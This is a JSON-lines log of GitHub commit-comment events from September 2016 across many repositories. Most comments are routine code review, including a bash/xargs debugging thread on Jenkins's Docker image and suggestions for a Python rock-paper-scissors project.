{"id":"4626917919","type":"CommitCommentEvent","actor":{"login":"charles-dyfis-net"},"repo":{"name":"jenkinsci/docker"},"payload":{"comment":{"id":19198073,"position":null,"line":null,"path":null,"commit_id":"bbbb76d46b8ea934fdec9f2ed0ebd49a923496d4","created_at":"2016-09-27T21:00:59Z","updated_at":"2016-09-27T21:00:59Z","body":"We'd be better off reverting the commit than implementing that particular fix.\r\n\r\nThat said, I'd like to figure out how that's happening -- I can't reproduce it.\r\n\r\n```\r\njava_opts_array=(); while IFS= read -r -d '' item; do java_opts_array+=( \"$item\" ); done < <(xargs printf '%s\\0' <<<\"$JAVA_OPTS\"); declare -p java_opts_array; echo \"${#java_opts_array[@]}\"\r\n```\r\n\r\n...emits:\r\n\r\n```\r\ndeclare -a java_opts_array='()'\r\n0\r\n```\r\n\r\n...that is, a zero-length (empty) array, one that doesn't insert any new arguments at all when expanded."}},"created_at":"2016-09-27T21:00:59Z"}
{"id":"4626919232","type":"CommitCommentEvent","actor":{"login":"MSF-Jarvis"},"repo":{"name":"ChikaraOSP/manifest"},"payload":{"comment":{"id":19198078,"position":null,"line":null,"path":null,"commit_id":"f41b7cd64f510da8897f6929224314bb5b0140df","created_at":"2016-09-27T21:01:13Z","updated_at":"2016-09-27T21:01:13Z","body":"GitKraken ignores global configs IIRC"}},"created_at":"2016-09-27T21:01:13Z"}
{"id":"4626919267","type":"CommitCommentEvent","actor":{"login":"okozlovlux"},"repo":{"name":"OlehKozlov/MadFood"},"payload":{"comment":{"id":19198079,"position":71,"line":71,"path":"app/src/main/java/ua/kozlov/madfood/utils/CircleView.java","commit_id":"593f4fb104db6641b6db68ff03c5c9a0816d6de9","created_at":"2016-09-27T21:01:14Z","updated_at":"2016-09-27T21:01:14Z","body":"@OlehKozlov , change to `if(null != foodsR)`"}},"created_at":"2016-09-27T21:01:14Z"}
{"id":"4626920072","type":"CommitCommentEvent","actor":{"login":"addaleax"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":19198080,"position":null,"line":null,"path":null,"commit_id":"6b443d1731a03ec1e7d207d31ee361b1e3ead646","created_at":"2016-09-27T21:01:22Z","updated_at":"2016-09-27T21:01:22Z","body":"If you refer to this being landed as a separate commit, I think that is actually okay. :)"}},"created_at":"2016-09-27T21:01:22Z"}
{"id":"4626923347","type":"CommitCommentEvent","actor":{"login":"arichardet"},"repo":{"name":"asteris-llc/converge"},"payload":{"comment":{"id":19198088,"position":112,"line":71,"path":"resource/user/preparer.go","commit_id":"fd6d07c439ddea2fe242e92949fae2921753241c","created_at":"2016-09-27T21:01:59Z","updated_at":"2016-09-27T21:01:59Z","body":"This would not catch if a GroupName was indicated and a GID=0 was indicated; 0 is a valid GID."}},"created_at":"2016-09-27T21:01:59Z"}
{"id":"4626923890","type":"CommitCommentEvent","actor":{"login":"diracdeltas"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19198089,"position":null,"line":null,"path":null,"commit_id":"814a723246de95b1beccc6412aee4bd1274aaf61","created_at":"2016-09-27T21:02:05Z","updated_at":"2016-09-27T21:02:05Z","body":"++"}},"created_at":"2016-09-27T21:02:05Z"}
{"id":"4626927575","type":"CommitCommentEvent","actor":{"login":"charles-dyfis-net"},"repo":{"name":"jenkinsci/docker"},"payload":{"comment":{"id":19198093,"position":null,"line":null,"path":null,"commit_id":"bbbb76d46b8ea934fdec9f2ed0ebd49a923496d4","created_at":"2016-09-27T21:02:43Z","updated_at":"2016-09-27T21:02:43Z","body":"@luka5z, ...could you provide output of `declare -p JAVA_OPTS JENKINS_OPTS`?"}},"created_at":"2016-09-27T21:02:43Z"}
{"id":"4626929588","type":"CommitCommentEvent","actor":{"login":"kosolapeg"},"repo":{"name":"kosolapeg/tuto"},"payload":{"comment":{"id":19198095,"position":null,"line":null,"path":null,"commit_id":"ce71ed24350cc0ac1a450ff82b1e37abe8ae2b5c","created_at":"2016-09-27T21:03:05Z","updated_at":"2016-09-27T21:03:05Z","body":"rgrtger"}},"created_at":"2016-09-27T21:03:05Z"}
{"id":"4626932802","type":"CommitCommentEvent","actor":{"login":"TheAlphaNerd"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":19198101,"position":null,"line":null,"path":null,"commit_id":"6b443d1731a03ec1e7d207d31ee361b1e3ead646","created_at":"2016-09-27T21:03:39Z","updated_at":"2016-09-27T21:03:39Z","body":"oh I was just being rowdy and too lazy to find a drake gif.\r\n\r\nHOTLINE FIX\r\n\r\n![http---fat gfycat com-creamyloathsomeamericanlobster](https://cloud.githubusercontent.com/assets/498775/18891672/535bd5b2-84d4-11e6-8034-3e8215d42654.gif)\r\n"}},"created_at":"2016-09-27T21:03:39Z"}
{"id":"4626938068","type":"CommitCommentEvent","actor":{"login":"joakimk"},"repo":{"name":"barsoom/review"},"payload":{"comment":{"id":19198116,"position":5,"line":8,"path":"lib/review/repo.ex","commit_id":"9bb49d2ffd476d653945cc2bc8c1311653ea01ac","created_at":"2016-09-27T21:04:35Z","updated_at":"2016-09-27T21:04:35Z","body":"Another comment to see if this app can display comments as they arrive."}},"created_at":"2016-09-27T21:04:35Z"}
{"id":"4626941675","type":"CommitCommentEvent","actor":{"login":"PureXYZ"},"repo":{"name":"LaRenegaws/Rails_Blog"},"payload":{"comment":{"id":19198126,"position":null,"line":null,"path":null,"commit_id":"27f169a1e88fdc9b474a95216fd6f29428a6e267","created_at":"2016-09-27T21:05:11Z","updated_at":"2016-09-27T21:05:11Z","body":"UP TO DATE"}},"created_at":"2016-09-27T21:05:11Z"}
{"id":"4626954421","type":"CommitCommentEvent","actor":{"login":"DeadneM"},"repo":{"name":"APOPHIS9283/Singularity"},"payload":{"comment":{"id":19198144,"position":null,"line":null,"path":null,"commit_id":"4f8e151e5c37e2ceec100c82446b7b9089b29d87","created_at":"2016-09-27T21:07:27Z","updated_at":"2016-09-27T21:07:27Z","body":"so you leave discard mount option ?"}},"created_at":"2016-09-27T21:07:27Z"}
{"id":"4626956645","type":"CommitCommentEvent","actor":{"login":"DesmondFox"},"repo":{"name":"DesmondFox/seaFight"},"payload":{"comment":{"id":19198148,"position":68,"line":141,"path":"field.cpp","commit_id":"c67c8ca5a1f742ff823fe73efdf3aa075d439c56","created_at":"2016-09-27T21:07:51Z","updated_at":"2016-09-27T21:07:51Z","body":"Основная часть"}},"created_at":"2016-09-27T21:07:51Z"}
{"id":"4626957630","type":"CommitCommentEvent","actor":{"login":"ryansutc"},"repo":{"name":"ryansutc/MathCalculator"},"payload":{"comment":{"id":19198153,"position":null,"line":null,"path":null,"commit_id":"e09844aacba774ec5db77efd69f65842aa847e8c","created_at":"2016-09-27T21:08:02Z","updated_at":"2016-09-27T21:08:02Z","body":"Still need to refactor so that button identification is not dependent on the xml string associated with the button"}},"created_at":"2016-09-27T21:08:02Z"}
{"id":"4626964696","type":"CommitCommentEvent","actor":{"login":"salkinium"},"repo":{"name":"dergraaf/xpcc"},"payload":{"comment":{"id":19198170,"position":5,"line":9,"path":"src/xpcc/architecture/platform/driver/uart/stm32/uart.cpp.in","commit_id":"b420ea76bd6d6729ff7948c39cdef38840b8f323","created_at":"2016-09-27T21:09:18Z","updated_at":"2016-09-27T21:09:18Z","body":"That's not equivalent."}},"created_at":"2016-09-27T21:09:18Z"}
{"id":"4626964761","type":"CommitCommentEvent","actor":{"login":"sambozek"},"repo":{"name":"divyasusarla/DSI-SF-2-divyasusarla"},"payload":{"comment":{"id":19198171,"position":null,"line":null,"path":null,"commit_id":"70ea9646d74a552662b0133eeb26d72e825c4457","created_at":"2016-09-27T21:09:19Z","updated_at":"2016-09-27T21:09:19Z","body":"I was given your project for review and have finally had the opening in my schedule to be able to look at what was going on. Thanks for understanding. \r\n\r\nThat said here is my look at your work. I'll start with some minor comments and then go through the problems.\r\n\r\n* The final notebook you present should be slightly cleaner. In a business situation it is a lot of scrolling to get to insights so far. You can improve on this by removing a lot of the info and descrie sections. \r\n* A few situations you approached with a brute force method. Although this is a safe and secure way of getting to the solution there's usually a more elegant way that saves you valuable typing time. \r\n* When a cell takes too long to run, it might be worth explaining why it's taking too long. That will also usually provide an insight as to how to work around it. For example, would more power help(spin up a server), are there too many parameters(reduce features/complexity)\r\n* When you leave a TK feature, is always handy to also explain what it will involve. With visualization what will be the most useful? How would your write up be approached?\r\n\r\nOkay now on to the problems:\r\n\r\n1. Aside from some of the points above it was very cleanly done. Your selection of features was clear, though your write up of what makes those features Las Vegas was not as descriptive as it could have been. Additinoally your correlation table might be a little easier to read with a heatmap. With your logisitic regression it might have been a valuable idea to perhaps a smaller selection of parameters across the linear space. One interesting question I'd have is how your logistic regression would compare to that of your KNN model in classifying Vegas, which do you think would be more resistant to overfitting?\r\n2. Again from the minor comments removing the print outs of the values will make it much easier to read and work with. Maybe have them on a line below and remove them afterwards. Your approach of isolating the service and the food was great! Very well done. It was apparent that there was a slight imbalance between the two classes, would that cause any issues? With the columns there did seem to be some cross over between the two like `'fast_service'` and `'fast_food'`. Your explination at the end as to the problems of your first report were great, and your future road map was also a very proper approach to the situation.\r\n3-5. Probably a good idea to look over the solutions. \r\n\r\nOverall your project was great, and my concerns are all rather minor, end of the project datacleaning and presentation based, not so much with model selection or implementation."}},"created_at":"2016-09-27T21:09:19Z"}
{"id":"4626969001","type":"CommitCommentEvent","actor":{"login":"popcorncolonel"},"repo":{"name":"popcorncolonel/Chrome-Extensions"},"payload":{"comment":{"id":19198181,"position":75,"line":348,"path":"Kappa Everywhere/contentscript.js","commit_id":"365f938289577306cad9754867d44c9f27e7866c","created_at":"2016-09-27T21:10:04Z","updated_at":"2016-09-27T21:10:04Z","body":"Hmmmm... I don't remember. I could add it back in I guess. "}},"created_at":"2016-09-27T21:10:04Z"}
{"id":"4626969486","type":"CommitCommentEvent","actor":{"login":"charles-dyfis-net"},"repo":{"name":"jenkinsci/docker"},"payload":{"comment":{"id":19198184,"position":null,"line":null,"path":null,"commit_id":"bbbb76d46b8ea934fdec9f2ed0ebd49a923496d4","created_at":"2016-09-27T21:10:09Z","updated_at":"2016-09-27T21:10:09Z","body":"Argh. BSD vs GNU xargs. Damnit. I've got this."}},"created_at":"2016-09-27T21:10:09Z"}
{"id":"4626970179","type":"CommitCommentEvent","actor":{"login":"Fishrock123"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":19198186,"position":null,"line":null,"path":null,"commit_id":"6b443d1731a03ec1e7d207d31ee361b1e3ead646","created_at":"2016-09-27T21:10:15Z","updated_at":"2016-09-27T21:10:15Z","body":"Errr, it's a floating patch?"}},"created_at":"2016-09-27T21:10:15Z"}
{"id":"4626975310","type":"CommitCommentEvent","actor":{"login":"salkinium"},"repo":{"name":"dergraaf/xpcc"},"payload":{"comment":{"id":19198202,"position":14,"line":22,"path":"src/xpcc/architecture/platform/driver/uart/stm32/uart.cpp.in","commit_id":"b420ea76bd6d6729ff7948c39cdef38840b8f323","created_at":"2016-09-27T21:11:12Z","updated_at":"2016-09-27T21:11:12Z","body":"This check should be extracted as a boolean into `driver.lb`. Too much duplication."}},"created_at":"2016-09-27T21:11:12Z"}
{"id":"4626975524","type":"CommitCommentEvent","actor":{"login":"kobitoko"},"repo":{"name":"kobitoko/CMPUT404-assignment-web-client"},"payload":{"comment":{"id":19198203,"position":null,"line":null,"path":null,"commit_id":"c276414fd7e6ec3b673941d4100285cd6923d085","created_at":"2016-09-27T21:11:14Z","updated_at":"2016-09-27T21:11:14Z","body":"NO IT DOESNT"}},"created_at":"2016-09-27T21:11:14Z"}
{"id":"4626979521","type":"CommitCommentEvent","actor":{"login":"spikebrehm"},"repo":{"name":"lelandrichardson/react-native-safe-module"},"payload":{"comment":{"id":19198210,"position":3,"line":3,"path":"src/index.js","commit_id":"b00f734e25ec87c57cfa4db0a8c013ac69a5c110","created_at":"2016-09-27T21:12:00Z","updated_at":"2016-09-27T21:12:00Z","body":"Maybe put a deprecation warning at runtime when using `create`, and a TODO for removing this in the next major version?"}},"created_at":"2016-09-27T21:12:00Z"}
{"id":"4626980063","type":"CommitCommentEvent","actor":{"login":"salkinium"},"repo":{"name":"dergraaf/xpcc"},"payload":{"comment":{"id":19198211,"position":14,"line":22,"path":"src/xpcc/architecture/platform/driver/uart/stm32/uart.cpp.in","commit_id":"b420ea76bd6d6729ff7948c39cdef38840b8f323","created_at":"2016-09-27T21:12:05Z","updated_at":"2016-09-27T21:12:05Z","body":"Or maybe use a Jinja2 variable? That may be more natural."}},"created_at":"2016-09-27T21:12:05Z"}
{"id":"4626983207","type":"CommitCommentEvent","actor":{"login":"salkinium"},"repo":{"name":"dergraaf/xpcc"},"payload":{"comment":{"id":19198217,"position":5,"line":9,"path":"src/xpcc/architecture/platform/driver/uart/stm32/uart.hpp.in","commit_id":"b420ea76bd6d6729ff7948c39cdef38840b8f323","created_at":"2016-09-27T21:12:40Z","updated_at":"2016-09-27T21:12:40Z","body":"That's equivalent, yes. 😛 "}},"created_at":"2016-09-27T21:12:40Z"}
{"id":"4626983649","type":"CommitCommentEvent","actor":{"login":"spikebrehm"},"repo":{"name":"lelandrichardson/react-native-safe-module"},"payload":{"comment":{"id":19198219,"position":4,"line":4,"path":"src/index.js","commit_id":"b00f734e25ec87c57cfa4db0a8c013ac69a5c110","created_at":"2016-09-27T21:12:45Z","updated_at":"2016-09-27T21:12:45Z","body":"Thought on naming: it's nice for methods to be named as verbs, like `createModule` and `createComponent`."}},"created_at":"2016-09-27T21:12:45Z"}
{"id":"4626984229","type":"CommitCommentEvent","actor":{"login":"jtlthe2"},"repo":{"name":"eapr225/Project-3"},"payload":{"comment":{"id":19198223,"position":null,"line":null,"path":null,"commit_id":"7ccd36fbd6f54be5dd0cbbcc580151de86481fd7","created_at":"2016-09-27T21:12:50Z","updated_at":"2016-09-27T21:12:50Z","body":"Added a third trigger."}},"created_at":"2016-09-27T21:12:50Z"}
{"id":"4626991861","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":19198232,"position":null,"line":null,"path":null,"commit_id":"9aa7a72a4adc364a566fc805c163e478e9953049","created_at":"2016-09-27T21:14:13Z","updated_at":"2016-09-27T21:14:13Z","body":"@SubJunk VLC's DLNA implementation is seriously flawed. There are so many problems with it that I don't think we should assume that the problem is with UMS. One basic problem is that it queries the whole directory structure recursively. If you have many shared files that means it will take time, especially in the very time-consuming way UMS works. On top of that it starts to re-query the whole tree relatively soon, I followed the log and found that UMS started to scan the same files again after a while. At the same time VLC's interface give no visal clues while it waits, and appear to \"hang\". I've seen people saying many places on the net that it can take 15 minutes or more for VLC to get the content up (with other servers). It might be that you simply haven't waited long enough.\r\n\r\nWhen I was testing this, I changed my shared files to just one folder with a few files in it and turned off all the \"extra stuff\" like transcoding folders etc. VLC will follow all of these all the way down. When I did this, it will show in \"just a few seconds\".\r\n\r\nThe devs at VLC has realized that the implementation is fubar, so it's supposedly rewritten from scratch in VLC 3.x. This version doesn't enumerate the whole directory tree first among others. VLC 3.x isn't released yet though. I've downloaded some of the nightly builds, but none of the ones I tested worked at all - neither at DLNA or to play \"normal\" files. Some crashed simply shortly after start before the GUI came up, so I gave up on testing the new functionality.\r\n\r\nFor those that have few shared files and are willing to wait, the current 2.x version works though - it is possible to use it to watch videos, so it's nice to a renderer configuration to avoid unnecessary transcoding for those that choose to live with it."}},"created_at":"2016-09-27T21:14:13Z"}
{"id":"4626993323","type":"CommitCommentEvent","actor":{"login":"salkinium"},"repo":{"name":"dergraaf/xpcc"},"payload":{"comment":{"id":19198235,"position":null,"line":null,"path":null,"commit_id":"b420ea76bd6d6729ff7948c39cdef38840b8f323","created_at":"2016-09-27T21:14:29Z","updated_at":"2016-09-27T21:14:29Z","body":"This is sooooooo cool! Thanks so much for doing this!"}},"created_at":"2016-09-27T21:14:29Z"}
{"id":"4626993658","type":"CommitCommentEvent","actor":{"login":"ahh2131"},"repo":{"name":"HankShorb/Sticks-Stones"},"payload":{"comment":{"id":19198236,"position":29,"line":29,"path":"RPS_HMM.py","commit_id":"0d505162af471ec320d298a516c92e24bce4d6f8","created_at":"2016-09-27T21:14:32Z","updated_at":"2016-09-27T21:14:32Z","body":"is there a better way to append these without saying append 3x?"}},"created_at":"2016-09-27T21:14:32Z"}
{"id":"4626996022","type":"CommitCommentEvent","actor":{"login":"kosolapeg"},"repo":{"name":"kosolapeg/tuto"},"payload":{"comment":{"id":19198238,"position":3,"line":3,"path":".gitattributes","commit_id":"ce71ed24350cc0ac1a450ff82b1e37abe8ae2b5c","created_at":"2016-09-27T21:14:59Z","updated_at":"2016-09-27T21:14:59Z","body":"****"}},"created_at":"2016-09-27T21:14:59Z"}
{"id":"4626996408","type":"CommitCommentEvent","actor":{"login":"luka5z"},"repo":{"name":"jenkinsci/docker"},"payload":{"comment":{"id":19198240,"position":null,"line":null,"path":null,"commit_id":"bbbb76d46b8ea934fdec9f2ed0ebd49a923496d4","created_at":"2016-09-27T21:15:03Z","updated_at":"2016-09-27T21:15:03Z","body":"I don't. If you could explain I will be extremely grateful;)"}},"created_at":"2016-09-27T21:15:03Z"}
{"id":"4627001378","type":"CommitCommentEvent","actor":{"login":"TheAlphaNerd"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":19198249,"position":null,"line":null,"path":null,"commit_id":"6b443d1731a03ec1e7d207d31ee361b1e3ead646","created_at":"2016-09-27T21:15:56Z","updated_at":"2016-09-27T21:15:56Z","body":"I was just being silly... floating patch makes sense... sorry for distraction\r\n\r\n\r\n![oszlj52](https://cloud.githubusercontent.com/assets/498775/18892058/0b880b5a-84d6-11e6-9a10-5aa93e93efc0.jpg)\r\n"}},"created_at":"2016-09-27T21:15:56Z"}
{"id":"4627002147","type":"CommitCommentEvent","actor":{"login":"Beep6581"},"repo":{"name":"Beep6581/RawTherapee"},"payload":{"comment":{"id":19198250,"position":null,"line":null,"path":null,"commit_id":"18c0f7ad9189ef55bfcb5ee6e23111ffef731c8d","created_at":"2016-09-27T21:16:06Z","updated_at":"2016-09-27T21:16:06Z","body":"Sorry @Floessie , I had to effectively revert this commit as I pulled just before you committed, and my commit included some more extensive changes to match RawPedia."}},"created_at":"2016-09-27T21:16:06Z"}
{"id":"4627004351","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"Jutho/TensorOperations.jl"},"payload":{"comment":{"id":19198255,"position":null,"line":null,"path":null,"commit_id":"5f11d86ea8fdee6428ebcb2ea0fa5f26c27b4c8a","created_at":"2016-09-27T21:16:30Z","updated_at":"2016-09-27T21:16:30Z","body":"CI-only changes don't really need re-tagging"}},"created_at":"2016-09-27T21:16:30Z"}
{"id":"4627004487","type":"CommitCommentEvent","actor":{"login":"kosolapeg"},"repo":{"name":"kosolapeg/tuto"},"payload":{"comment":{"id":19198256,"position":6,"line":6,"path":".gitattributes","commit_id":"ce71ed24350cc0ac1a450ff82b1e37abe8ae2b5c","created_at":"2016-09-27T21:16:32Z","updated_at":"2016-09-27T21:16:32Z","body":"`rt`"}},"created_at":"2016-09-27T21:16:32Z"}
{"id":"4627009884","type":"CommitCommentEvent","actor":{"login":"jfoug"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":19198266,"position":null,"line":null,"path":null,"commit_id":"7b47e453b4207fd758a2e2d2f5c642c15a8f32a6","created_at":"2016-09-27T21:17:32Z","updated_at":"2016-09-27T21:17:32Z","body":"@magnumripper do you know the right package to install?  It was libasan0 on my ubuntu, so that is what I started with.  Now I am out of ideas, and not sure how to check against travisCI"}},"created_at":"2016-09-27T21:17:32Z"}
{"id":"4627011138","type":"CommitCommentEvent","actor":{"login":"ahh2131"},"repo":{"name":"HankShorb/Sticks-Stones"},"payload":{"comment":{"id":19198269,"position":91,"line":91,"path":"RPS_HMM.py","commit_id":"0d505162af471ec320d298a516c92e24bce4d6f8","created_at":"2016-09-27T21:17:46Z","updated_at":"2016-09-27T21:17:46Z","body":"this is a good use case for a dictionary structure. instead of nested if else, you can define win & lose states and query that object separately, like so:\r\n\r\nresults = {\r\n    ROCK: {\r\n        ROCK: 2,\r\n        PAPER: 0,\r\n        SCISSORS: 1\r\n    },\r\n    PAPER: .....etc etc\r\n}\r\n\r\nnow with this object, you can simply query it with:\r\n\r\nresults[player_move][cp_move]\r\n\r\n..and it'll return loss/win/tie!"}},"created_at":"2016-09-27T21:17:46Z"}
{"id":"4627016269","type":"CommitCommentEvent","actor":{"login":"SubJunk"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":19198276,"position":null,"line":null,"path":null,"commit_id":"9aa7a72a4adc364a566fc805c163e478e9953049","created_at":"2016-09-27T21:18:45Z","updated_at":"2016-09-27T21:18:45Z","body":"@Nadahar cool, thanks for the summary. Interesting that their phone app is so different - it's actually really nice to use"}},"created_at":"2016-09-27T21:18:45Z"}
{"id":"4627021914","type":"CommitCommentEvent","actor":{"login":"charles-dyfis-net"},"repo":{"name":"jenkinsci/docker"},"payload":{"comment":{"id":19198282,"position":null,"line":null,"path":null,"commit_id":"bbbb76d46b8ea934fdec9f2ed0ebd49a923496d4","created_at":"2016-09-27T21:19:50Z","updated_at":"2016-09-27T21:19:50Z","body":"Fix submitted as PR #357.\r\n\r\nWhen given an empty string on input, GNU xargs -- unlike BSD xargs -- still executes the command it's given.\r\n\r\nThus, `printf '%s\\0'` runs with no additional arguments giving a `%s`. In compliance with the POSIX spec for shell printf, this treats the `%s` as a single string and emits a raw NUL, which the while loop then reads and appends to the array.\r\n\r\n---\r\n\r\nThus, on a system with GNU xargs, one gets `declare -a java_opts_array='( [0]=\"\" )'`, whereas on a system with BSD xargs (where I tested this code), one gets `declare -a java_opts_array='( )'`.\r\n"}},"created_at":"2016-09-27T21:19:50Z"}
{"id":"4627022467","type":"CommitCommentEvent","actor":{"login":"HankShorb"},"repo":{"name":"HankShorb/Sticks-Stones"},"payload":{"comment":{"id":19198284,"position":29,"line":29,"path":"RPS_HMM.py","commit_id":"0d505162af471ec320d298a516c92e24bce4d6f8","created_at":"2016-09-27T21:19:57Z","updated_at":"2016-09-27T21:19:57Z","body":"So the reason I did it that way was because I was unsure if python handled arrays like objects. Didn't want to just have one array object that was updated in all three places, no matter which one I referenced.\r\n\r\nFor just the append part, I'm not sure. Dunno if there's a better way to append three objects to an empty array.\r\n\r\nI also initially misread the prompt thinking that I couldn't use libraries like numpi (why I kinda made an ugly 2d array by hand), but I'm pretty sure I can, so I was thinking I'd just use that to make this."}},"created_at":"2016-09-27T21:19:57Z"}
{"id":"4627029263","type":"CommitCommentEvent","actor":{"login":"ahh2131"},"repo":{"name":"HankShorb/Sticks-Stones"},"payload":{"comment":{"id":19198294,"position":123,"line":123,"path":"RPS_HMM.py","commit_id":"0d505162af471ec320d298a516c92e24bce4d6f8","created_at":"2016-09-27T21:21:11Z","updated_at":"2016-09-27T21:21:11Z","body":"lots of if else - take this opportunity to show off some pythonic powers ~~~~\r\ni believe you can do something to replace the if else's here, to make them more like a switch statement, like so:\r\n\r\ndef lose():\r\n   print 'lose'\r\n   cp_wins += 1\r\n\r\ndef win():\r\n    print 'win'\r\n    cp_wins += 1\r\n\r\ndef tie():\r\n    print 'tied'\r\n    ties += 1\r\n\r\nfinal_result = {\r\n   0: win,\r\n   1: lose,\r\n   2: tie,\r\n}\r\n\r\nand then call:\r\n\r\nfinal_result[winner]()\r\n\r\nand it'll print accordingly! wala!"}},"created_at":"2016-09-27T21:21:11Z"}
{"id":"4627029807","type":"CommitCommentEvent","actor":{"login":"kareneos"},"repo":{"name":"kareneos/36_programacion"},"payload":{"comment":{"id":19198299,"position":null,"line":null,"path":null,"commit_id":"76003ec83298e0f96d80bf4b0755e2bee8b401a8","created_at":"2016-09-27T21:21:17Z","updated_at":"2016-09-27T21:21:17Z","body":"Dar click en _View Raw_ para descargar el archivo."}},"created_at":"2016-09-27T21:21:17Z"}
{"id":"4627030314","type":"CommitCommentEvent","actor":{"login":"AACO"},"repo":{"name":"BourbonWarfare/POTATO"},"payload":{"comment":{"id":19198301,"position":29,"line":55,"path":"addons/radios/functions/fnc_addAcreBriefing.sqf","commit_id":"ff0f4e10fef3c3a622073552cf4b77747aab1f2c","created_at":"2016-09-27T21:21:23Z","updated_at":"2016-09-27T21:21:23Z","body":"This might not be the behavior we want, it's _possible_ to be in an opfor unit, but not in an opfor group (i.e. a BluFor group)"}},"created_at":"2016-09-27T21:21:23Z"}
{"id":"4627031223","type":"CommitCommentEvent","actor":{"login":"rpbrandau"},"repo":{"name":"rpbrandau/master-assignment-0"},"payload":{"comment":{"id":19198303,"position":null,"line":null,"path":null,"commit_id":"b48a45264c42eed9b53a419964909e40450dfdd9","created_at":"2016-09-27T21:21:33Z","updated_at":"2016-09-27T21:21:33Z","body":"Added my name and ONID ID"}},"created_at":"2016-09-27T21:21:33Z"}
{"id":"4627031394","type":"CommitCommentEvent","actor":{"login":"HankShorb"},"repo":{"name":"HankShorb/Sticks-Stones"},"payload":{"comment":{"id":19198304,"position":91,"line":91,"path":"RPS_HMM.py","commit_id":"0d505162af471ec320d298a516c92e24bce4d6f8","created_at":"2016-09-27T21:21:34Z","updated_at":"2016-09-27T21:21:34Z","body":"Oooh crazy, so it's using dictionaries nested in dictionaries\r\n\r\nCool cool"}},"created_at":"2016-09-27T21:21:34Z"}
{"id":"4627032021","type":"CommitCommentEvent","actor":{"login":"ahh2131"},"repo":{"name":"HankShorb/Sticks-Stones"},"payload":{"comment":{"id":19198308,"position":15,"line":15,"path":"RPS_HMM.py","commit_id":"0d505162af471ec320d298a516c92e24bce4d6f8","created_at":"2016-09-27T21:21:42Z","updated_at":"2016-09-27T21:21:42Z","body":"you may want to move this to a separate file, for organizational purposes"}},"created_at":"2016-09-27T21:21:42Z"}
{"id":"4627032761","type":"CommitCommentEvent","actor":{"login":"Jutho"},"repo":{"name":"Jutho/TensorOperations.jl"},"payload":{"comment":{"id":19198310,"position":null,"line":null,"path":null,"commit_id":"5f11d86ea8fdee6428ebcb2ea0fa5f26c27b4c8a","created_at":"2016-09-27T21:21:50Z","updated_at":"2016-09-27T21:21:50Z","body":"But this seems the easiest way to get everything fixed from my laptop right now. I am out of my comfort zone when it concerns these matters ..."}},"created_at":"2016-09-27T21:21:50Z"}
{"id":"4627033593","type":"CommitCommentEvent","actor":{"login":"srirambv"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19198313,"position":null,"line":null,"path":null,"commit_id":"41acbd0ca208296e06068e508c49f2636ed41ac5","created_at":"2016-09-27T21:21:59Z","updated_at":"2016-09-27T21:21:59Z","body":"@diracdeltas @jonathansampson  Checked on 0.12.3dev-RC1 and this is the current behavior. If I enable block-script globally and then open twitter.com it doesn't redirect to mobile.twitter.com..But if I open twitter.com and then enable block-script at page level then it redirects to mobile.twitter.com"}},"created_at":"2016-09-27T21:21:59Z"}
{"id":"4627036868","type":"CommitCommentEvent","actor":{"login":"HankShorb"},"repo":{"name":"HankShorb/Sticks-Stones"},"payload":{"comment":{"id":19198322,"position":15,"line":15,"path":"RPS_HMM.py","commit_id":"0d505162af471ec320d298a516c92e24bce4d6f8","created_at":"2016-09-27T21:22:35Z","updated_at":"2016-09-27T21:22:35Z","body":"class computer_player, or just everything above?"}},"created_at":"2016-09-27T21:22:35Z"}
{"id":"4627037788","type":"CommitCommentEvent","actor":{"login":"ahh2131"},"repo":{"name":"HankShorb/Sticks-Stones"},"payload":{"comment":{"id":19198323,"position":29,"line":29,"path":"RPS_HMM.py","commit_id":"0d505162af471ec320d298a516c92e24bce4d6f8","created_at":"2016-09-27T21:22:45Z","updated_at":"2016-09-27T21:22:45Z","body":"👍 "}},"created_at":"2016-09-27T21:22:45Z"}
{"id":"4627037956","type":"CommitCommentEvent","actor":{"login":"AACO"},"repo":{"name":"BourbonWarfare/POTATO"},"payload":{"comment":{"id":19198324,"position":29,"line":31,"path":"addons/radios/functions/fnc_reinitializeRadios.sqf","commit_id":"ff0f4e10fef3c3a622073552cf4b77747aab1f2c","created_at":"2016-09-27T21:22:47Z","updated_at":"2016-09-27T21:22:47Z","body":"This should be before the sleep"}},"created_at":"2016-09-27T21:22:47Z"}
{"id":"4627039138","type":"CommitCommentEvent","actor":{"login":"AACO"},"repo":{"name":"BourbonWarfare/POTATO"},"payload":{"comment":{"id":19198325,"position":43,"line":45,"path":"addons/radios/functions/fnc_reinitializeRadios.sqf","commit_id":"ff0f4e10fef3c3a622073552cf4b77747aab1f2c","created_at":"2016-09-27T21:23:01Z","updated_at":"2016-09-27T21:23:01Z","body":"This should also be before the sleep"}},"created_at":"2016-09-27T21:23:01Z"}
{"id":"4627039295","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"Jutho/TensorOperations.jl"},"payload":{"comment":{"id":19198326,"position":null,"line":null,"path":null,"commit_id":"5f11d86ea8fdee6428ebcb2ea0fa5f26c27b4c8a","created_at":"2016-09-27T21:23:03Z","updated_at":"2016-09-27T21:23:03Z","body":"okay whatever's easiest"}},"created_at":"2016-09-27T21:23:03Z"}
